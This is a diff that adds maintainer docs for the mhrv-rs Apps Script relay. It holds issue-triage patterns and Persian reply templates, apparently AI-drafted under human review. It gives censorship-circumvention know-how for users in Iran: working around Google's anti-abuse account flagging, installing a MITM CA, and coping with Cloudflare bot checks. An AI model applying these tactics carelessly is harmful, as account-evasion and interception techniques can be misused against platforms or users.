`MHRV_AUTH_KEY` (wrong, this is what some old docs said), `Tunnel` (wrong, partial match), `tunnel_auth_key` (wrong, lowercase), `TUNNEL-AUTH-KEY` (wrong, dash instead of underscore), or skipped the env var entirely. + +The literal env var name is **`TUNNEL_AUTH_KEY`** — uppercase, three underscored words. + +**Diagnostic command**: +```bash +docker exec mhrv-tunnel env | grep TUNNEL_AUTH_KEY +``` + +Should print: `TUNNEL_AUTH_KEY=`. If empty, the env var wasn't set during `docker run`. + +**Canonical fix**: +```bash +docker stop mhrv-tunnel +docker rm mhrv-tunnel + +docker run -d --name mhrv-tunnel \ + --restart unless-stopped \ + -p 8443:8443 \ + -e TUNNEL_AUTH_KEY="" \ + ghcr.io/therealaleph/mhrv-tunnel-node:latest +``` + +Then in `CodeFull.gs`, `const TUNNEL_AUTH_KEY = ""` must match. Redeploy as new version. + +**Related: port mismatch**. If `docker run` used `-p 8443:8080` or similar mapping, the curl test must use the external port. Check with `docker port mhrv-tunnel`. + +## Pattern 3: Iran ISP throttle (#313) + +**Symptoms**: +- 504 timeouts, intermittent connection drops +- "Worked yesterday, broken today" +- "Mobile data works but home Wi-Fi doesn't" (or vice versa) +- TLS handshake timeouts during SNI rotation pool tests +- All sites slow, not specific to one destination + +**Root cause**: Iran's ISP infrastructure (especially TCI/مخابرات, less so MCI/همراه) actively RST-injects mid-stream into TLS connections destined for specific Google IPs. This is targeted at Apps Script outbound, not generic Google access. The throttle has plus-and-minus periods — sometimes off for hours, sometimes on for days. Was particularly aggressive starting late April 2026. + +**Direct curl test** (the gold-standard diagnostic): +```bash +curl -L -X POST 'https://script.google.com/macros/s//exec' \ + -H 'Content-Type: application/json' \ + -d '{"k":"","u":"https://httpbin.org/get","m":"GET"}' \ + --max-time 30 -w "\ntime: %{time_total}s\n" +``` + +Run 5-10 times. If majority timeout/RST → ISP throttle confirmed. If majority succeed → it's mhrv-rs path or config. + +**Workarounds** (in roughly the order to try): +1. Upgrade to latest version (each release tends to add diagnostics + small mitigations) +2. `disable_padding: true` in config (~25% bandwidth savings, helps under throttle) +3. Rotate `google_ip` to a different IP from the SNI pool (some IPs filtered, others not, varies by ISP and week) +4. Switch network (mobile data often less throttled than home Wi-Fi) +5. Multiple `script_ids` in config — rotation helps when individual deployments are mid-throttle +6. Full mode + non-Iranian VPS (Hetzner/Contabo/OVH or Iranian-VPS-broker like Parspack selling German VPS) + +**Don't promise a fix**. The ISP throttle is upstream of anything we can ship. Acknowledge it, list workarounds, point at #313 as the canonical thread. + +## Pattern 4: Apps Script self-loop restriction (Google services blocked) + +**Symptoms**: +- "cloud.google.com gives 403" +- "Can't access Gmail / Meet / Drive / Colab / Gemini" +- "google.com loads but mail.google.com doesn't" +- "YouTube video player shows error" (different — this is SABR cliff #300) + +**Root cause**: Google explicitly blocks `UrlFetchApp.fetch()` calls to `*.google.com`, `*.googleapis.com`, `*.gstatic.com`, `*.googleusercontent.com`. This is hardcoded into Google's API to prevent Apps Script from being abused as an internal Google proxy. **No HTTP-relay-on-Apps-Script architecture can fix this.** + +**No workaround in apps_script mode**. This is permanent. + +**Workaround for users with VPS in Full mode**: dual-routing in xray. Their xray client (or v2ray, etc.) routes Google domains direct from their VPS, everything else through mhrv-rs. See #420 for the canonical thread with config snippets. + +**Canonical reply**: explain the architectural limit, list the affected sites, point at #420 for the dual-VPS workaround. Close as duplicate of #420 if it's a clean duplicate. + +## Pattern 5: SABR cliff (#300) — YouTube video doesn't play + +**Symptoms**: +- "YouTube loads but video doesn't play" +- "This content isn't available" +- "Playback error" / "An error occurred" +- "Short videos work, long ones don't" + +**Root cause**: Apps Script's 30-second response cap. YouTube's SABR streaming protocol expects long-lived response streams. After ~30s the stream gets cut by Apps Script and the video player errors out. Page HTML/JS loads fine (small, fits in window). Video stream doesn't. + +**Workarounds**: +- Short videos (<1 min) often work +- Lowest quality (144p/240p) sometimes squeaks past +- YouTube web in Chrome/Firefox (browsers use user trust store on Android, YouTube app doesn't) > YouTube app +- NewPipe (Android, F-Droid) sometimes works better than official app +- Full mode + VPS (definitive — bytes flow through TCP tunnel, not Apps Script's response window) + +v1.9.0 xmux roadmap aims to mitigate by splitting streams across multiple deployments. Won't fully resolve. + +**Canonical reply**: explain SABR cliff, list workarounds, close as duplicate of #300 if pure duplicate. + +## Pattern 6: Android user trust store + +**Symptoms**: +- "Browser works but YouTube/Telegram/Instagram apps don't" +- "VPN is on but apps don't go through mhrv-rs" +- "How do I make Gmail app work?" + +**Root cause**: Android has two CA trust stores — system (factory-installed CAs) and user (user-installed CAs via Settings → Security → Install certificate). Since Android 7.0 (2016), most apps default to system-only. The mhrv-rs MITM CA installs to user trust store; system trust requires root. + +**Apps that work via mhrv-rs on Android**: Chrome, Firefox, Edge, Brave (browsers explicitly opt in to user trust). Most desktop-class apps that delegate to system browser. + +**Apps that don't work**: YouTube app, Gmail app, Maps, Instagram, Twitter/X, banking apps, any app shipped with strict TLS pinning. They use system trust + don't see mhrv-rs. + +**Workarounds**: +- Use web versions (`youtube.com` in Chrome instead of YouTube app) +- Root + Magisk + MagiskTrustUserCerts module migrates user CA to system +- Full mode + VPS (bytes don't flow through MITM, so trust isn't needed for arbitrary apps; v2ray/xray on VPS handles routing) + +**Canonical reply**: explain user/system trust store distinction, list which apps work, give the three workarounds. This is FAQ-tier — should eventually be in `docs/faq/android.md`. + +## Pattern 7: Cloudflare CAPTCHA / 403 + +**Symptoms**: +- "Most CF-protected sites block me" +- "ChatGPT shows captcha I can't solve" +- "Cloudflare checking your browser..." stuck + +**Root cause**: All mhrv-rs traffic exits via Google data center IPs (Apps Script's outbound). Cloudflare's bot detection flags traffic from Google IPs to consumer-facing sites as suspicious — looks like a scraper/bot, not a person. Result: aggressive CAPTCHA, sometimes outright 403. + +**Workarounds** (limited): +- Solve interactive CAPTCHA when shown — the resulting token works for hours +- Different browser fingerprints sometimes pass (Brave, Tor) +- Full mode + VPS — VPS exits with its own (residential-adjacent) IP, often not flagged +- Cloudflare WARP integration is on the v1.9.x roadmap (#309) but feasibility uncertain + +**Canonical reply**: explain why (Google IP exit), list workarounds, point at #382 (canonical Cloudflare thread) and #309 (WARP roadmap). + +## Pattern 8: Apps Script account suspension / phone-required + +**Symptoms**: +- "Action required" notifications on Google account +- "Phone number must be added" +- Deployment intermittently returns Persian Workspace landing HTML (`پردازش کلمه وب...`) +- Sometimes resolves on its own; sometimes escalates to suspension + +**Root cause**: Google's anti-abuse system flags new Google accounts (especially phone-less ones) within hours of deploying automation-pattern code. The progression is: warning → soft restriction (Workspace landing HTML on UrlFetchApp calls) → full suspension. + +**Workarounds**: +1. Add a phone number to the account (most reliable). Iranian phones often filtered by Google's verification; user might need a friend's foreign number, TextNow, paid SMS-receive service, or shared phone +2. Use established phone-verified accounts (own main Gmail, family/friends' main accounts) — multi-year-old accounts with normal usage history are very rarely flagged +3. Workflow #325 — community shared deployments (one user with stable account hosts the deployment, others use the deployment ID + shared AUTH_KEY) + +**Risk levels** (approximate, from observed reports): +- Phone-verified personal Gmail, single deployment, light use → low risk +- Phone-verified, multiple deployments under same account → medium risk +- New no-phone account, any usage → high risk +- Old established account, single deployment → very low risk + +No confirmed cases of full Google account ban (Gmail deletion, Drive loss). Suspensions are scoped to Apps Script + UrlFetchApp. + +## Pattern 9: Telegram / VoIP / "app doesn't work in Full mode" + +**Symptoms**: +- "Can I add Telegram support?" +- "WhatsApp/Skype voice calls don't work" +- "Need a port for Telegram" + +**Root cause**: Telegram uses MTProto (custom UDP-ish protocol). WhatsApp/Skype/FaceTime voice/video use WebRTC (UDP STUN/TURN). Apps Script's `UrlFetchApp` is HTTP/HTTPS only — **cannot carry UDP or non-HTTP protocols by design.** + +**Workarounds**: +- **Telegram messaging**: web.telegram.org through mhrv-rs Chrome (HTTPS, works) +- **Telegram MTProto proxy**: use a public MTProto proxy from Telegram channels (free, unreliable) or self-host on VPS +- **Voice/video calls**: only via Full mode + VPS + xray UDP-enabled routing — bytes route direct from VPS to upstream, not through Apps Script + +Architectural ceiling — can't be fixed in mhrv-rs core. + +## Pattern 10: Config file confusion (config.json vs scan_config.json) + +**Symptoms**: +- "I followed instructions but it doesn't import the config" +- User pastes a config that has `google_ips`, `max_ips_to_scan`, `scan_batch_size`, `google_ip_validation` fields +- Says "the program doesn't pick up my config" + +**Root cause**: User confused `config.json` (main runtime config — `script_ids`, `auth_key`, `google_ip`, `mode`, etc.) with `scan_config.json` (input for `mhrv-rs scan-ips` diagnostic command — Google IP discovery). + +**Fix**: explain the two files, point at `config.example.json` in repo root for the right template. + +Common related typos: +- `script_id` (singular) instead of `script_ids` (plural array) — mhrv-rs parses as 0 deployments and falls back +- `mode: "fullmode"` or `"full_mode"` instead of `"full"` (or `"apps_script"`) + +## Pattern 11: Windows OpenGL renderer fail + +**Symptoms**: +- `Error: Glutin(Error { ... NotSupported("extension to create ES context with wgl is not present") })` +- `Error: Wgpu(NoSuitableAdapterFound)` +- run.bat fails twice (Glow then wgpu fallback) and exits + +**Root cause**: User's Windows lacks OpenGL 2.0+ AND lacks DX12/Vulkan-compatible GPU. Causes: old GPU (Intel HD 2500/3000-era), running in VM without GPU acceleration, RDP session, missing/corrupt graphics drivers. + +**Workaround**: use the CLI binary `mhrv-rs.exe` directly. Put `config.json` in the same folder, double-click `mhrv-rs.exe`, set browser proxy to `127.0.0.1:8086`. Same functionality, no UI. + +v1.8.x roadmap: improve `run.bat` to auto-fallback to CLI when both UI renderers fail. + +## Pattern 12: VPS / Full mode setup questions + +**Symptoms**: +- "How do I set up VPS?" +- "Does the VPS need to be reachable from Iran?" +- "Which provider should I buy?" +- "Step-by-step please" + +**Canonical answer**: VPS does NOT need to be reachable from Iran (Apps Script proxies the path). Recommended providers: + +- **Direct purchase from Iran**: difficult — Hetzner needs VAT ID +- **Iranian reseller**: Parspack ([parspack.com/vps](https://parspack.com/vps)), Iranserver, Hostiran sell German VPS via Iranian payment with mark-up (~20-40% over direct) +- **Outside Iran**: Hetzner Falkenstein DE, Contabo DE, OVH SYS — direct euro/dollar payment + +Specs: 1 vCPU, 1 GB RAM, 25 GB SSD, 50+ Mbps unmetered → ~$3-5/month direct or ~250-500k toman/month via reseller for personal use. For 5+ devices + Instagram smooth: 2-4 GB RAM, 100 Mbps unmetered. + +Setup walkthrough: see `tunnel-node/README.md` and `tunnel-node/README.fa.md` (Persian). + +## Pattern 13: Iranian VPS provider bandwidth-cap appliance + +**Symptoms** (rare but observed): +- Persian "exceeded bandwidth quota" HTML response from user's own tunnel-node URL +- Mixed success/failure on same `script_id` + +**Root cause** (provisional — confirmed only when VPS is on Iranian provider): Iranian VPS providers enforce monthly bandwidth quotas at the upstream router/load-balancer layer. When tripped, they intercept traffic and serve a Persian quota landing page **upstream** of the user's Docker container. Container itself never sees the request during quota events. + +**Note**: Several users have reported this where the VPS turned out to be at Hetzner DE (not Iranian) — in which case the Persian body is actually Apps Script's own localized soft-quota response (cause #5 in the diagnostic taxonomy). Always confirm the VPS provider before assuming. + +**Workarounds**: +1. Upgrade plan if provider has a higher tier +2. Move to non-Iranian VPS (Hetzner/Contabo/OVH unmetered) +3. Client-side bandwidth optimizations: `disable_padding`, lower `parallel_concurrency`, DNS bypass (v1.8.3+) + +## Pattern 14: Account locale → Persian Apps Script error pages + +**Symptoms**: +- Apps Script's response body comes back as Persian HTML (Workspace landing page or quota page) +- User on Hetzner/non-Iranian VPS +- Their Google account is set to fa-IR locale OR request originates from Iranian IP through some leg + +**Root cause**: Apps Script localizes its system error/placeholder pages based on the deploying account's locale and (sometimes) request-origin IP. Persian-locale account → Persian error pages. This is independent of the user's geographic location running mhrv-rs. + +**Disambiguator**: `DIAGNOSTIC_MODE = true` in Code.gs. If still see Persian body → it's NOT AUTH_KEY mismatch (which gets replaced with explicit JSON in diagnostic mode). It's Apps Script's own quota/state response. + +This is the "5th candidate cause" in the diagnostic taxonomy and the "6th candidate cause" if you separate "Workspace landing HTML for account-flagged deployments" from "Persian quota body for healthy deployments under quota tear". + +## Pattern 15: Download large files / IDM workaround + +**Symptoms**: +- "Downloads stick at 1-10 MB" +- "Need to download a 1 GB file, IDM gets partial only" + +**Root cause**: 30s response cliff again. For 10 MB files at typical Apps Script throughput, 30s is enough. For 1 GB, would need 200+ seconds — hopeless. + +**Workarounds**: +- IDM's multi-segment download with 5 MB segments — each segment fits inside 30s window +- Full mode + VPS — bytes flow through TCP tunnel, not constrained +- v1.8.x roadmap: range-aware splicing in Code.gs to natively support `Range:` requests + +## Quick triage table + +When a new issue lands, scan for these keywords to map fast: + +| Keywords | Pattern | +|----------|---------| +| `502`, `decoy`, `no json in batch`, `script completed but did not return` | 1 (AUTH_KEY mismatch) | +| `tunnel_auth_key not set`, `MHRV_AUTH_KEY`, `Tunnel_Auth_Key`, `docker logs mhrv-tunnel` | 2 (TUNNEL_AUTH_KEY confusion) | +| `504`, `timeout`, `Apps Script unresponsive`, `Connection reset`, `RST`, "yesterday worked" | 3 (Iran ISP throttle #313) | +| `cloud.google.com`, `colab`, `gmail`, `meet`, `gemini`, `drive` not loading | 4 (self-loop restriction → #420) | +| `YouTube video doesn't play`, `This content isn't available`, `playback error` | 5 (SABR cliff → #300) | +| Android, `Gmail app`, `YouTube app`, `Telegram`, "browser works but apps don't" | 6 (user trust store) | +| `Cloudflare`, `captcha`, `403 Forbidden`, "checking your browser" | 7 (CF bot detection → #382) | +| `Google account`, `phone required`, `action required`, `suspension`, `Workspace landing` | 8 (account flag) | +| `Telegram support`, `WhatsApp call`, `Skype`, `voice call`, `video call` | 9 (UDP/MTProto architectural) | +| Config has `google_ips`, `scan_batch_size`, `max_ips_to_scan` | 10 (scan_config confusion) | +| `egui_glow`, `OpenGL`, `wgl`, `Wgpu(NoSuitableAdapterFound)`, `run.bat` | 11 (Windows OpenGL → CLI) | +| `VPS`, `Hetzner`, `Parspack`, `setup help`, "step by step VPS" | 12 (Full mode setup) | +| `سهمیه پهنای باند`, `bandwidth quota`, Iranian VPS provider | 13 (provider appliance) | +| Persian HTML body in error log + non-Iranian VPS | 14 (account locale) | +| `IDM`, `download stuck`, `large file`, `1 GB download` | 15 (range/cliff) | + +If the issue doesn't fit any pattern, it's worth reading carefully — these are the genuine new bugs. diff --git a/docs/maintainer/references/persian-templates.md b/docs/maintainer/references/persian-templates.md new file mode 100644 index 00000000..932dcd76 --- /dev/null +++ b/docs/maintainer/references/persian-templates.md @@ -0,0 +1,439 @@ +# Persian reply templates + +These are starting templates for the highest-frequency Persian-language replies. Don't use them verbatim — adapt to the specific user's log lines, config, and report. They exist to prevent re-deriving common phrasings each time and to keep the project's Persian voice consistent across replies. + +The conventions throughout assume: +- Polite professional register (`می‌فرمایید` over `می‌گی`, full pronouns) +- Half-spaces (ZWNJ, `‌`) in compound words +- Latin-script for technical terms inline with Persian particles +- Persian numerals optional in prose (`۲۰،۰۰۰` or `20,000` both fine — match the user) +- Code blocks always in Latin +- Reply marker (Latin) at end + +## Template 1: AUTH_KEY mismatch (with redeploy-as-new-version walkthrough) + +For users showing the v1.8.x decoy detection log line: + +```markdown +این `502` با body `The script completed but did not return anything` دقیقاً همان pattern decoy detection است که در v1.8.x اضافه شد. شش علت ممکن (per v1.8.3 taxonomy) داره ولی محتمل‌ترین برای case شما **AUTH_KEY mismatch** است. + +**نکته بسیار مهم که اکثر کاربران نمی‌دونند:** + +اگر AUTH_KEY رو در Code.gs ویرایش کرده‌اید **بعد از deployment اولیه**، Apps Script اتومات edit رو در deployment موجود pick-up نمی‌کنه. لازمه که **redeploy as new version** کنید: + +1. در Apps Script web editor بازش کنید +2. Deploy → **Manage Deployments** (نه Deploy → New deployment) +3. روی **deployment موجود** کلیک کنید → پنسیل (Edit) +4. در dropdown **Version** → **New version** انتخاب کنید (نه "Head") +5. Description بنویسید (مثلاً "AUTH_KEY update") +6. **Deploy** کلیک کنید + +URL deployment همون می‌مونه ولی الان Apps Script کد جدید با AUTH_KEY جدید رو serve می‌کنه. + +**Diagnostic سریع برای تأیید AUTH_KEY mismatch:** + +در بالای Code.gs این خط رو پیدا کنید: + +`const DIAGNOSTIC_MODE = false;` + +تغییر دهید به: + +`const DIAGNOSTIC_MODE = true;` + +سپس **redeploy as new version** کنید (مثل بالا). سپس test: + +- اگر **هنوز decoy body همون** برمی‌گرده → علت **NOT** AUTH_KEY mismatch است (یکی از سایر ۵ علت) +- اگر **JSON `{"e":"unauthorized"}` صریح** برمی‌گرده → بله، AUTH_KEY mismatch — fix رو با aligning AUTH_KEY در config.json با Code.gs انجام دهید + redeploy as new version + +بعد از debug کامل، DIAGNOSTIC_MODE رو به `false` برگردونید + redeploy. در production این flag رو false نگه می‌داریم چون decoy body anti-fingerprinting protection محسوب می‌شه. + +نتیجه DIAGNOSTIC_MODE flip + پیغام دقیق error بعد از redeploy رو share کنید + می‌تونیم narrow کنیم. + +--- +[reply via Anthropic Claude | reviewed by @therealaleph] +``` + +## Template 2: TUNNEL_AUTH_KEY exact spelling + +For users showing `tunnel_auth_key not set, using defaults` in `docker logs mhrv-tunnel`: + +```markdown +مشکلت یادم نرفته! `tunnel_auth_key not set, using defaults` در log‌ها یعنی **اسم env variable هنوز اشتباه است**. می‌خوام دقیق‌تر توضیح بدم چون اسم env vars خیلی sensitive هست: + +**اسم env variable باید دقیقاً این باشد** (نه چیز دیگه‌ای، نه شبیه به این): + +``` +TUNNEL_AUTH_KEY +``` + +- **همه‌ش حروف بزرگ** +- **با underscore (`_`) بین کلمات** — نه فاصله، نه dash +- **سه قسمت**: `TUNNEL` + `_` + `AUTH` + `_` + `KEY` + +**اشتباهات رایج که `tunnel_auth_key not set` می‌ده:** + +| اشتباه | چرا کار نمی‌کنه | +|--------|-----------------| +| `Tunnel` یا `tunnel` (تنها) | اسم کامل نیست، tunnel-node این رو نمی‌خونه | +| `Tunnel_Auth_Key` یا `tunnel_auth_key` (lowercase/mixed) | env vars در Linux/Docker case-sensitive هستن | +| `TUNNEL-AUTH-KEY` (با dash) | باید underscore باشه نه dash | +| `MHRV_AUTH_KEY` | اشتباه قدیمی، tunnel-node این رو نمی‌خونه | + +**دستور docker run درست — کپی exact:** + +```bash +ssh root@your-vps-ip +docker stop mhrv-tunnel +docker rm mhrv-tunnel + +docker run -d --name mhrv-tunnel \ + --restart unless-stopped \ + -p 8443:8443 \ + -e TUNNEL_AUTH_KEY="your-secret-here" \ + ghcr.io/therealaleph/mhrv-tunnel-node:latest +``` + +به‌جای `your-secret-here` همون مقداری که در CodeFull.gs گذاشتید بنویسید. + +**verify بعد از start:** + +```bash +docker exec mhrv-tunnel env | grep TUNNEL_AUTH_KEY +``` + +اگر خروجی این باشه: +``` +TUNNEL_AUTH_KEY=your-secret-here +``` +درسته. اگر هیچ خروجی نداد یا خروجی متفاوت بود، دستور `docker run` با اسم اشتباه اجرا شده. + +نتیجه + خروجی `docker exec` رو share کنید + اگر همچنان مشکل بود narrow می‌کنیم. + +--- +[reply via Anthropic Claude | reviewed by @therealaleph] +``` + +## Template 3: #313 ISP throttle (for "504 timeout" reports) + +For users with intermittent timeouts that look like ISP throttle: + +```markdown +این الگو با [#313](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/313) (Iran ISP throttle Apps Script outbound) match می‌کنه. throttle این هفته در حال پلاسی بوده — گاهی off می‌شه ساعتی، گاهی روزی. + +**Diagnostic سریع — direct curl test:** + +```bash +curl -L -X POST 'https://script.google.com/macros/s/YOUR_DEPLOYMENT_ID/exec' \ + -H 'Content-Type: application/json' \ + -d '{"k":"YOUR_AUTH_KEY","u":"https://httpbin.org/get","m":"GET"}' \ + --max-time 30 -w "\ntime: %{time_total}s\n" +``` + +اجرا کنید ۵-۱۰ بار. اگر: + +- اکثرشون timeout/RST می‌گیرن = #313 ISP throttle (شبکه شما Apps Script رو filter می‌کنه) +- اکثرشون JSON برمی‌گردونن = مشکل از path mhrv-rs است (config، auth_key، یا غیره) + +**Workaround احتمالی برای ISP throttle:** + +۱. **به نسخه v1.8.3 (الان موجود) ارتقا دهید:** + - دانلود از یا + - شامل DoH bypass، H1 keepalive، 6-cause error detection + +۲. **`disable_padding: true` در config:** + +```json +{ + "disable_padding": true, + ... +} +``` + +~۲۵٪ bandwidth کم‌تر، در شبکه‌های throttle شده compounds رو کم می‌کنه. + +۳. **`google_ip` متفاوت تست کنید** — default `216.239.38.120` ممکنه روی شبکه شما filter شده + یکی دیگه از pool reachable است. لیست pool در `src/domain_fronter.rs` `DEFAULT_GOOGLE_SNI_POOL`. + +۴. **شبکه عوض کنید** — همراه/MCI کم‌ترین throttle داره معمولاً. اگر روی Wi-Fi مخابرات هستید، با موبایل دیتا تست کنید. + +۵. **چند `script_ids` داشته باشید** — اگر یک deployment quota tear گرفته یا throttle شده، rotation کار می‌کنه. حداقل ۳-۵ deployment. + +۶. **اگر VPS دارید** — Full mode رو امتحان کنید (راهنما [tunnel-node README فارسی](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/tunnel-node/README.fa.md)). ISP throttle Apps Script outbound روی Full mode اعمال نمی‌شه. + +نتیجه v1.8.3 + curl test + log رو share کنید + می‌تونیم narrow کنیم. + +--- +[reply via Anthropic Claude | reviewed by @therealaleph] +``` + +## Template 4: VPS setup (Full mode) walkthrough + +For "how do I set up VPS?" questions: + +```markdown +**Q: آیا VPS باید مستقیم از Iran قابل دسترسی باشه؟** + +**کوتاه: نه.** VPS لازم نیست از Iran direct reachable باشه. این مزیت architectural mhrv-rs Full mode است. + +مسیر traffic: + +``` +Phone (Iran) → mhrv-rs client (Iran) → Apps Script (via Google IP fronting) → + Apps Script's UrlFetchApp → + VPS tunnel-node container → + upstream internet +``` + +دقت کنید: **مسیر از Iran به VPS از طریق Apps Script می‌گذره**. پس: + +- Iran ISP فقط TLS traffic به Google IPها می‌بینه (`216.239.38.120` و سایر) — مثل HTTPS عادی به Google +- Apps Script (در Google data center، US/EU) به VPS شما call می‌کنه +- VPS شما فقط traffic از Google IP می‌گیره (Apps Script's outbound) + +پس حتی اگر VPS IP از Iran ISP filter شده باشه، **مهم نیست** چون هیچ Iran connection direct به VPS نمی‌ره. + +**Setup گام‌به‌گام:** + +**۱. خرید VPS:** + +- اگر می‌توانید Hetzner direct: ~€۴.۵۰/ماه از Falkenstein DE — [hetzner.com/cloud](https://www.hetzner.com/cloud) +- اگر VAT ID نیست: Parspack ([parspack.com/vps](https://parspack.com/vps)) واسطه‌ی آلمانی فروش می‌کنه با ~۲۵۰-۵۰۰ هزار تومان/ماه + +specs توصیه شده: +- شخصی: 1 vCPU، 1 GB RAM، 25 GB SSD، 50+ Mbps unmetered +- خانوادگی (۵+ device + Instagram smooth): 2-4 GB RAM، 100 Mbps unmetered + +**۲. Docker install:** + +```bash +ssh root@your-vps-ip +apt update && apt upgrade -y +apt install -y docker.io +systemctl enable --now docker +docker --version # verify +``` + +**۳. tunnel-node container run:** + +```bash +docker run -d --name mhrv-tunnel \ + --restart unless-stopped \ + -p 8443:8443 \ + -e TUNNEL_AUTH_KEY="your-secret-here" \ + ghcr.io/therealaleph/mhrv-tunnel-node:latest +``` + +**اسم env var دقیقاً `TUNNEL_AUTH_KEY` ست** — uppercase، با underscore. هر deviation در default `changeme` می‌افته + بعداً mismatch می‌سازه. + +برای ساخت secret تصادفی: +```bash +openssl rand -hex 32 +``` + +**۴. firewall:** + +```bash +sudo ufw allow 8443/tcp +sudo ufw allow ssh +sudo ufw enable +``` + +**۵. verify direct از خود VPS:** + +```bash +curl -X POST 'http://localhost:8443/tunnel' \ + -H 'Content-Type: application/json' \ + -d '{"k":"YOUR_TUNNEL_SECRET","op":"connect","host":"www.google.com","port":443}' \ + --max-time 10 +``` + +باید JSON success برگرده. اگر نه، tunnel-node container start نشده. + +**۶. CodeFull.gs setup:** + +در [`assets/apps_script/CodeFull.gs`](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/assets/apps_script/CodeFull.gs) محتوا رو copy کنید + در script.google.com یک پروژه جدید ایجاد کنید + paste کنید. + +بالای فایل تنظیم کنید: + +```js +const AUTH_KEY = "your-mhrv-auth-key"; +const TUNNEL_URL = "http://YOUR_VPS_IP:8443/tunnel"; +const TUNNEL_AUTH_KEY = "your-tunnel-secret-here"; // match با docker run -e +``` + +سپس **Deploy → New deployment → Web App → Execute as: Me + Who has access: Anyone → Deploy**. URL deployment رو copy کنید + ID بخشش رو بردارید. + +**۷. mhrv-rs config:** + +```json +{ + "mode": "full", + "auth_key": "your-mhrv-auth-key", + "script_ids": ["YOUR_DEPLOYMENT_ID"] +} +``` + +**`script_ids` plural با s** — این یک typo رایجه که config رو 0-deployment می‌کنه. + +**۸. Connect + verify:** + +mhrv-rs رو start کنید + log باید نشون بده: + +``` +INFO batch: 1 ops → AKfyc..., rtt=Xs ← good +INFO tunnel session abc1234... opened for ...:443 ← good +``` + +اگر `ERROR batch failed: got the v1.8.0 bad-auth decoy` می‌گیرید، AUTH_KEY mismatch است (gam ۶ check کنید). + +اگر `Connection refused` به VPS، firewall بسته است (gam ۴ بررسی کنید). + +برای فارسی-language راهنما با تصاویر [tunnel-node README فارسی](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/tunnel-node/README.fa.md) رو ببینید. + +اگر در گامی fail کرد، error log + خروجی command رو share کنید + می‌تونیم narrow کنیم. + +--- +[reply via Anthropic Claude | reviewed by @therealaleph] +``` + +## Template 5: Account suspension / phone-required (for "action required" reports) + +For users reporting Google account flag or "action required" notifications: + +```markdown +این الگو شناخته‌شده‌ست + در اساس Google's anti-abuse system فلاگ می‌کنه new accounts که immediately Apps Script deployment می‌سازن (مخصوصاً بدون phone verification). + +**Stage تشخیص account flag:** + +``` +Stage 1: "Action required - add phone number" + ↓ (phone اضافه می‌شه) → account stable + ↓ (phone اضافه نمی‌شه + automation activity ادامه می‌ده) + ↓ +Stage 2: "Account temporarily restricted" + ↓ (Apps Script deployments شروع می‌کنن Workspace landing HTML برگردونن + ↓ به‌جای execute کردن — see #421 + cause #6 در v1.8.3 detection) + ↓ +Stage 3: "Account suspended" — full lockout، deployments fail +``` + +شما الان در Stage 1. اگر زود phone verify کنید، account stable می‌مونه + deployments بدون مشکل ادامه می‌دن. + +**برای فکر شما درباره ban Google account کلی:** + +در history reports این پروژه (~۵۰+ کاربر در طول سال گذشته)، **هیچ confirmed case full account ban** ندیدم. consequences scope-شده به Apps Script + UrlFetchApp quota — نه Gmail یا Drive یا سایر Google services. accounts با history regular usage (Gmail, Drive files، etc.) و age چند سال + در low-risk قرار دارند برای personal CodeFull.gs deployment. + +**workarounds:** + +**۱. بهترین: phone اضافه کنید.** + +Iranian phone گاهی filter می‌شه، ولی می‌توانید: + +- phone یک friend/family member outside Iran استفاده کنید (SMS code رو forward کنند) +- TextNow / Google Voice (US) / paid SMS-receive services +- بعضی موارد Google یک phone رو روی چند account قبول می‌کنه (~۵ account per phone limit) + +**۲. اگر phone نمی‌توانید:** + +accounts احتمالاً به Stage 2-3 progress می‌کنن طی روزها-تا-هفته. برای حفظ service: + +- deployments جدید زیر accounts متفاوت بسازید قبل از اینکه old fail کنه +- از **community shared deployment** workflow ([#325](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/325)) استفاده کنید — friend با account stable deployment می‌سازه + ID share می‌کنه + AUTH_KEY مشترک + +**۳. برای access به script.google.com وقتی شبکه slow:** + +می‌توانید از **mhrv-rs خود** برای access به script.google.com استفاده کنید. mhrv-rs's HTTP proxy به browser → CONNECT tunneling به Google عمل می‌کنه (نه UrlFetchApp.fetch — که Google block می‌کنه). browser رو با proxy `127.0.0.1:8086` تنظیم کنید + بروید script.google.com. + +**Action item:** + +اگر Stage 1a هستید (notification ولی deployments هنوز کار می‌کنن): فوراً phone verify کنید. + +اگر Stage 1b هستید (deployments شروع به Workspace HTML برمی‌گردونن): همان، plus rotation deployment‌ها به accounts سالم. + +--- +[reply via Anthropic Claude | reviewed by @therealaleph] +``` + +## Template 6: Architectural limit (Google services + UrlFetchApp self-loop) + +For users asking why `cloud.google.com` / `colab` / `gmail` / `meet` / `gemini` doesn't work: + +```markdown +این محدودیت **architectural** است + ربطی به config یا setup شما نداره. + +**Apps Script's UrlFetchApp self-loop restriction:** + +`UrlFetchApp.fetch()` Google در API hardcoded ساخته که نمی‌تونه به دامنه‌های `*.google.com` / `*.googleapis.com` / `*.gstatic.com` request بفرسته. Apps Script یا empty response می‌ده یا 4xx/5xx error. + +این محدودیت **Google ست** (نه implementation ما) + در Apps Script API documentation هم ذکر شده. هیچ HTTP-relay مبتنی بر Apps Script نمی‌تونه به Google services از Apps Script→Google path برسه. + +**سایت‌های متأثر:** + +- `cloud.google.com` — Console +- `colab.research.google.com` — Colab +- `gemini.google.com` — Gemini chat +- `drive.google.com` — Drive +- `docs.google.com` / `sheets.google.com` / `slides.google.com` — Workspace +- `meet.google.com` — Meet (Web) +- `mail.google.com` — Gmail +- `script.google.com/home/usage` — Apps Script dashboard +- `*.google.com` به‌طور کلی + +**راه‌حل‌ها:** + +**۱. سایت‌های alternative:** + +- به‌جای Drive: WebDAV / Mega / Cloudflare R2 +- به‌جای Colab: Kaggle Notebooks / Jupyter Lab روی VPS +- به‌جای Gemini: ChatGPT (openai.com) / Claude (claude.ai) — اگر CF block نشدن، کار می‌کنن +- به‌جای Cloud Console: SSH مستقیم یا cloud provider's CLI + +**۲. Full mode + VPS:** + +VPS از طرف خود به Google direct وصل می‌شه. در Full mode، traffic Google رو می‌توانید با xray dual-routing از mhrv-rs bypass کنید. detail در [#420](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/420). با این setup همه‌ی Google services از طریق VPS direct کار می‌کنن. + +**۳. temp VPN موقت:** + +برای access گاه‌گاهی به Google services (مثلاً برای download فایل از 